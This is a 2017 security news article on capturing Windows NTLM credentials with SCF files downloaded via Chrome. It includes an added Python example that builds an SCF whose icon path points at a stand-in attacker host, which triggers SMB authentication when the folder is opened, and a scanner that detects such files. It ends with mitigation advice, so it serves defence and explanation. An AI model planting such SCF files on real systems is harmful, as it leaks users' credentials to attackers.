You Can Steal Windows Login Credentials via Google Chrome and SCF Files
By Catalin Cimpanu | May 16, 2017
Just by opening a folder that contains a malicious SCF file, a user unwittingly sends their Windows login credentials (in practice the NTLM challenge-response, which can be cracked offline or relayed) to an attacker-controlled server, via Google Chrome and the SMB protocol.
The technique itself is not new; it combines two older ones: one taken from the Stuxnet operation, and one detailed by a security researcher at the Black Hat security conference.
…
SCF stands for Shell Command File and is a file format that supports a very limited set of Windows Explorer commands, such as opening a Windows Explorer window or showing the Desktop. The “Show Desktop” shortcut we all use on a daily basis is an SCF file. An SCF file can also name the icon Explorer should draw for it (the IconFile entry); if that entry points at a UNC path on a remote host, Explorer fetches the icon over SMB as soon as the folder is displayed, and in doing so authenticates to that host with the current user's credentials, without any click on the file.
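The following is an added example, not code from the original article or from the researcher it quotes. It builds the two-line SCF file described above and then scans a folder for SCF files whose IconFile would make Explorer authenticate to a remote host. The host name attacker.example and the file names are made up for illustration.

```python
"""
Added example (not from the original article): build an SCF file whose
IconFile points at a remote UNC share, then scan a folder for such files.
The host/share names used below are constructed for illustration.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Layout of the classic "Show Desktop.scf"; only IconFile varies here.
SCF_TEMPLATE = (
    "[Shell]\r\n"
    "Command=2\r\n"
    "IconFile={icon}\r\n"
    "[Taskbar]\r\n"
    "Command=ToggleDesktop\r\n"
)

# Matches a UNC path such as \\host\share\icon.ico and captures "host".
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def build_scf(icon_path: str) -> str:
    """Return the text of a Show-Desktop-style SCF file.

    When Explorer renders a folder containing this file it resolves IconFile
    to draw the icon. A UNC path makes it open an SMB connection to that host
    and authenticate as the logged-on user (NTLM challenge/response).
    """
    return SCF_TEMPLATE.format(icon=icon_path)


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI-style parser: {section: {key: value}}.

    Section and key names are lower-cased because Explorer treats them
    case-insensitively, so a scanner must not rely on exact spelling.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(text: str) -> Optional[str]:
    """Return the host an SCF's IconFile would make Explorer contact, or None."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_RE.match(icon)
    return match.group(1) if match else None


def scan_folder(folder: Path) -> List[Tuple[str, str]]:
    """List (filename, remote host) for every .scf in folder that points off-box."""
    hits = []
    for path in sorted(folder.iterdir()):
        # Compare the suffix case-insensitively: Explorer honours ".SCF" too.
        if not path.is_file() or path.suffix.lower() != ".scf":
            continue
        host = remote_icon_host(path.read_text(errors="replace"))
        if host:
            hits.append((path.name, host))
    return hits


def demo() -> List[Tuple[str, str]]:
    """Write a benign and a malicious SCF into a temp folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        # Benign: the real Show Desktop shortcut uses a local icon resource.
        (folder / "Show Desktop.scf").write_text(build_scf("explorer.exe,3"))
        # Constructed malicious file: attacker.example is a made-up host.
        (folder / "invoice.scf").write_text(
            build_scf(r"\\attacker.example\share\icon.ico")
        )
        return scan_folder(folder)


if __name__ == "__main__":
    for name, host in demo():
        print(f"{name}: Explorer would authenticate to {host} over SMB")
```

The scanner flags only UNC icon paths, which is the property that turns a folder listing into an outbound SMB authentication; a local path such as explorer.exe,3 is what the legitimate Show Desktop shortcut uses and is left alone.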
…
As a way to mitigate these types of attacks, Stankovic advises that users configure their Chrome browser to ask where to save each file individually.
Users can do this by visiting:
Settings -> Show advanced settings -> Ask where to save each file before downloading
More advanced protection measures include blocking outbound SMB traffic (TCP ports 445 and 139) at the host or perimeter firewall for destinations outside the local network, so that workstations cannot authenticate to SMB servers on the Internet.
